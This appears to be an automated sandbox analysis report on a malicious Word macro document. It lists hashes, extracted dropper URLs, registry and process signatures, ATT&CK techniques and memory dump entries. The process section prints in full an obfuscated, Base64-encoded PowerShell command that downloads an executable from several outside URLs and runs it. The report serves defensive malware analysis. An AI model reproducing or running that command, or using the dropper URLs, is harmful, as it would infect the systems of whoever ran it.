9243618e3533ddf75d1106555b3aad908b5a34d8ae7a1065a683bf73e6b21a4d

General

Target

eef3b819be406ef7408059d08dd393b1_JaffaCakes118.doc
Size

187KB
MD5

eef3b819be406ef7408059d08dd393b1
SHA1

d10c57a77e5e893eadc4f183c69cf545039a0bcd
SHA256

9243618e3533ddf75d1106555b3aad908b5a34d8ae7a1065a683bf73e6b21a4d
SHA512

823c29ca73cda047d5365086e8aa6a5d6f411d6ded4fbd35459b967d90ec6dbd44530f923e073a25c0579b018b988b62f7649d0ed6586f083964bfac32570b1f
SSDEEP

3072:dA9ov+mLIX7wzt0HHDnwjacRHvvvvZo8gEmv:Sat0TwDRi8gEmv

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://techiweek.com/wp-includes/FW6/

exe.dropper

https://ravi-tools.com/js/1/

exe.dropper

https://providedigital.com/wp-admin/Igvi3l/

exe.dropper

https://nghiencauca.com/wp-includes/BOInu4E/

exe.dropper

http://jietuo66.com/hwqsv/oC/

exe.dropper

https://oklatu.com/wp-admin/i/

exe.dropper

https://blog.thejobstack.com/pmloibg/M/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3584	1324	POwersheLL.exe	82

Blocklisted process makes network request 6 IoCs

flow	pid	Process
24	3584	POwersheLL.exe
28	3584	POwersheLL.exe
31	3584	POwersheLL.exe
33	3584	POwersheLL.exe
36	3584	POwersheLL.exe
43	3584	POwersheLL.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
4136	WINWORD.EXE
4136	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3584	POwersheLL.exe
3584	POwersheLL.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3584	POwersheLL.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
4136	WINWORD.EXE
4136	WINWORD.EXE
4136	WINWORD.EXE
4136	WINWORD.EXE
4136	WINWORD.EXE
4136	WINWORD.EXE
4136	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eef3b819be406ef7408059d08dd393b1_JaffaCakes118.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4136

C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
POwersheLL -ENCOD JABSAHYAYgB1ADkAMABnAD0AKAAnAEoAJwArACgAJwByACcAKwAnADgAYQBkAHUAJwApACsAJwAzACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUATgBWADoAVQBTAEUAUgBQAFIAbwBmAEkAbABFAFwAZgAyAGMANAB4AHQAawBcAHkAcQBfAGkAYgB4AFAAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABJAFIARQBDAFQATwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBjAFUAUgBgAGkAdABZAGAAUAByAE8AVABPAGAAYwBgAE8AbAAiACAAPQAgACgAJwB0ACcAKwAnAGwAJwArACgAJwBzADEAMgAnACsAJwAsACAAJwApACsAKAAnAHQAbABzACcAKwAnADEAMQAsACAAJwArACcAdAAnACsAJwBsACcAKQArACcAcwAnACkAOwAkAEIAcwBtAHcAYgBiAHQAIAA9ACAAKAAnAFgAYgAnACsAKAAnAHUAJwArACcAcQBrACcAKQArACgAJwBsACcAKwAnAGYAegBvACcAKQApADsAJABCAGQAYQBvAGEAcABjAD0AKAAnAFkAJwArACcAcgAnACsAKAAnAF8AXwAnACsAJwBfAGoAdQAnACkAKQA7ACQARgB6ADIAXwB0AGEAdwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnAFcAJwArACcAbwA1AEYAJwApACsAKAAnADIAYwAnACsAJwA0ACcAKwAnAHgAdABrACcAKQArACcAVwBvACcAKwAoACcANQBZAHEAXwAnACsAJwBpAGIAeAAnACkAKwAoACcAcABXAG8AJwArACcANQAnACkAKQAuACIAUgBlAGAAUABsAEEAQwBFACIAKAAoACcAVwAnACsAJwBvADUAJwApACwAJwBcACcAKQApACsAJABCAHMAbQB3AGIAYgB0ACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAJABMAGcAeABqAGcAbgB6AD0AKAAnAEoAYQAnACsAJwBjAF8AJwArACgAJwAyACcAKwAnAG4AcAAnACkAKQA7ACQASgA0AG4AagBpAHoAOQA9ACYAKAAnAG4AJwArACcAZQAnACsAJwB3AC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAATgBlAFQALgBXAEUAYgBDAGwASQBFAG4AdAA7ACQAWQBfAHQAMABzAHEAZwA9ACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgAnACsAJwAvAC8AJwApACsAJwB0ACcAKwAoACcAZQBjACcAKwAnAGgAaQB3AGUAZQBrACcAKQArACgAJwAuAGMAJwArACcAbwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGkAbgBjACcAKwAnAGwAdQBkACcAKQArACgAJwBlAHMALwBGAFcANgAnACsAJwAvACoAaAAnACsAJwB0ACcAKQArACgAJwB0AHAAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAcgAnACsAJwBhAHYAJwApACsAKAAnAGkAJwArACcALQB0AG8AbwBsAHMAJwArACcALgAnACkAKwAnAGMAbwAnACsAKAAnAG0AJwArACcALwBqAHMALwAxACcAKQArACcALwAqACcAKwAnAGgAdAAnACsAKAAnAHQAcAAnACsAJwBzADoALwAvACcAKQArACgAJwBwAHIAbwAnACsAJwB2AGkAJwApACsAJwBkACcAKwAoACcAZQBkAGkAJwArACcAZwAnACkAKwAoACcAaQB0AGEAbAAuACcAKwAnAGMAJwApACsAJwBvACcAKwAoACcAbQAvACcAKwAnAHcAJwApACsAJwBwACcAKwAoACcALQBhAGQAbQBpACcAKwAnAG4AJwArACcALwBJAGcAdgBpACcAKwAnADMAJwArACcAbAAnACkAKwAoACcALwAqAGgAJwArACcAdAAnACkAKwAnAHQAcAAnACsAKAAnAHMAOgAnACsAJwAvACcAKQArACgAJwAvAG4AJwArACcAZwAnACkAKwAnAGgAaQAnACsAKAAnAGUAbgBjACcAKwAnAGEAdQBjAGEALgAnACsAJwBjAG8AJwApACsAJwBtACcAKwAoACcALwB3AHAALQBpAG4AJwArACcAYwAnACsAJwBsACcAKQArACgAJwB1AGQAJwArACcAZQAnACkAKwAnAHMALwAnACsAJwBCAE8AJwArACgAJwBJAG4AdQAnACsAJwA0AEUALwAqAGgAJwApACsAKAAnAHQAdABwACcAKwAnADoAJwApACsAJwAvACcAKwAnAC8AJwArACgAJwBqACcAKwAnAGkAJwArACcAZQB0AHUAbwA2ADYALgBjAG8AJwArACcAbQAvAGgAJwApACsAKAAnAHcAJwArACcAcQBzAHYALwBvACcAKQArACgAJwBDAC8AJwArACcAKgAnACkAKwAnAGgAJwArACcAdAAnACsAKAAnAHQAcABzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBvAGsAbABhAHQAJwArACcAdQAnACkAKwAnAC4AYwAnACsAKAAnAG8AbQAvACcAKwAnAHcAJwApACsAJwBwACcAKwAoACcALQBhACcAKwAnAGQAbQBpAG4ALwAnACkAKwAoACcAaQAvACcAKwAnACoAJwApACsAKAAnAGgAdAB0ACcAKwAnAHAAcwA6AC8AJwArACcALwBiAGwAJwArACcAbwBnAC4AJwApACsAKAAnAHQAaABlAGoAbwBiAHMAdAAnACsAJwBhACcAKQArACcAYwAnACsAKAAnAGsALgAnACsAJwBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACkAKwAnAHAAJwArACgAJwBtAGwAJwArACcAbwBpACcAKQArACcAYgAnACsAKAAnAGcAJwArACcALwBNACcAKQArACcALwAnACkALgAiAHMAUABsAGAAaQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQARABxADgAYwA4AF8AcgA9ACgAJwBZACcAKwAnADMAJwArACgAJwB4AGwAJwArACcAOAA4AGMAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABYAHAAMAAzAGcAbQBlACAAaQBuACAAJABZAF8AdAAwAHMAcQBnACkAewB0AHIAeQB7ACQASgA0AG4AagBpAHoAOQAuACIARABgAG8AYABXAG4ATABvAGAAQQBkAGYAaQBMAGUAIgAoACQAWABwADAAMwBnAG0AZQAsACAAJABGAHoAMgBfAHQAYQB3ACkAOwAkAFcAZgA3AF8AYwBmAG0APQAoACgAJwBLADgAYgAnACsAJwBfACcAKQArACcAbQAnACsAJwBkAHYAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAEYAegAyAF8AdABhAHcAKQAuACIATABlAGAATgBHAHQASAAiACAALQBnAGUAIAAzADEAMAAwADMAKQAgAHsALgAoACcASQAnACsAJwBuAHYAbwBrAGUALQAnACsAJwBJACcAKwAnAHQAZQBtACcAKQAoACQARgB6ADIAXwB0AGEAdwApADsAJABRADUAdABuAHIAaABxAD0AKAAnAEQAJwArACcAbQBvACcAKwAoACcAMgAnACsAJwBuAGgAcQAnACkAKQA7AGIAcgBlAGEAawA7ACQAVQBkAHYAcwBxAGwAYQA9ACgAJwBGAHkAJwArACgAJwBhACcAKwAnADAAcgAnACkAKwAnAGYANQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEMAagBrAGMAdAA5AG8APQAoACcATAAnACsAKAAnAGoAOAA0ACcAKwAnADkAOQAnACsAJwBiACcAKQApAA==
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3584

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\TCDEC9A.tmp\iso690.xsl

Filesize
263KB

MD5
ff0e07eff1333cdf9fc2523d323dd654

SHA1
77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

SHA256
3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

SHA512
b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dspkwf3r.ho0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
1KB

MD5
1cfa111e647256f1c03001426d374d50

SHA1
58b4bcfd754743cb4dc74f9fe37c720979681bb4

SHA256
02bf08cf04911f79b5374a0ec5dd89e3ad35af611c160a5b776ba0edc84ef579

SHA512
834a051a36373125f75336fb574022de8b8547e227e98bab500db1ae40fa5ef22fad541391bea6c55ae2c2474bf8daaf6400e870a667e66b650fd1e8df967467

Download Submit
memory/3584-69-0x00007FFD22050000-0x00007FFD22245000-memory.dmp

Filesize
2.0MB

Download
memory/3584-220-0x00007FFD22050000-0x00007FFD22245000-memory.dmp

Filesize
2.0MB

Download
memory/3584-100-0x00007FFD22050000-0x00007FFD22245000-memory.dmp

Filesize
2.0MB

Download
memory/3584-77-0x000001DDD8670000-0x000001DDD8692000-memory.dmp

Filesize
136KB

Download
memory/4136-27-0x00007FFD22050000-0x00007FFD22245000-memory.dmp

Filesize
2.0MB

Download
memory/4136-6-0x00007FFD22050000-0x00007FFD22245000-memory.dmp

Filesize
2.0MB

Download
memory/4136-14-0x00007FFD22050000-0x00007FFD22245000-memory.dmp

Filesize
2.0MB

Download
memory/4136-12-0x00007FFD22050000-0x00007FFD22245000-memory.dmp

Filesize
2.0MB

Download
memory/4136-11-0x00007FFD22050000-0x00007FFD22245000-memory.dmp

Filesize
2.0MB

Download
memory/4136-10-0x00007FFD22050000-0x00007FFD22245000-memory.dmp

Filesize
2.0MB

Download
memory/4136-8-0x00007FFD22050000-0x00007FFD22245000-memory.dmp

Filesize
2.0MB

Download
memory/4136-5-0x00007FFD22050000-0x00007FFD22245000-memory.dmp

Filesize
2.0MB

Download
memory/4136-15-0x00007FFCDFC80000-0x00007FFCDFC90000-memory.dmp

Filesize
64KB

Download
memory/4136-16-0x00007FFCDFC80000-0x00007FFCDFC90000-memory.dmp

Filesize
64KB

Download
memory/4136-26-0x00007FFD22050000-0x00007FFD22245000-memory.dmp

Filesize
2.0MB

Download
memory/4136-0-0x00007FFD220ED000-0x00007FFD220EE000-memory.dmp

Filesize
4KB

Download
memory/4136-60-0x00007FFD22050000-0x00007FFD22245000-memory.dmp

Filesize
2.0MB

Download
memory/4136-9-0x00007FFD22050000-0x00007FFD22245000-memory.dmp

Filesize
2.0MB

Download
memory/4136-7-0x00007FFCE20D0000-0x00007FFCE20E0000-memory.dmp

Filesize
64KB

Download
memory/4136-13-0x00007FFD22050000-0x00007FFD22245000-memory.dmp

Filesize
2.0MB

Download
memory/4136-86-0x00007FFD22050000-0x00007FFD22245000-memory.dmp

Filesize
2.0MB

Download
memory/4136-85-0x00007FFD220ED000-0x00007FFD220EE000-memory.dmp

Filesize
4KB

Download
memory/4136-87-0x00007FFD22050000-0x00007FFD22245000-memory.dmp

Filesize
2.0MB

Download
memory/4136-88-0x00007FFD22050000-0x00007FFD22245000-memory.dmp

Filesize
2.0MB

Download
memory/4136-89-0x00007FFD22050000-0x00007FFD22245000-memory.dmp

Filesize
2.0MB

Download
memory/4136-90-0x00007FFD22050000-0x00007FFD22245000-memory.dmp

Filesize
2.0MB

Download
memory/4136-4-0x00007FFCE20D0000-0x00007FFCE20E0000-memory.dmp

Filesize
64KB

Download
memory/4136-99-0x00007FFD22050000-0x00007FFD22245000-memory.dmp

Filesize
2.0MB

Download
memory/4136-2-0x00007FFCE20D0000-0x00007FFCE20E0000-memory.dmp

Filesize
64KB

Download
memory/4136-3-0x00007FFCE20D0000-0x00007FFCE20E0000-memory.dmp

Filesize
64KB

Download
memory/4136-1-0x00007FFCE20D0000-0x00007FFCE20E0000-memory.dmp

Filesize
64KB

Download
memory/4136-241-0x00007FFCE20D0000-0x00007FFCE20E0000-memory.dmp

Filesize
64KB

Download
memory/4136-243-0x00007FFCE20D0000-0x00007FFCE20E0000-memory.dmp

Filesize
64KB

Download
memory/4136-244-0x00007FFCE20D0000-0x00007FFCE20E0000-memory.dmp

Filesize
64KB

Download
memory/4136-242-0x00007FFCE20D0000-0x00007FFCE20E0000-memory.dmp

Filesize
64KB

Download
memory/4136-245-0x00007FFD22050000-0x00007FFD22245000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads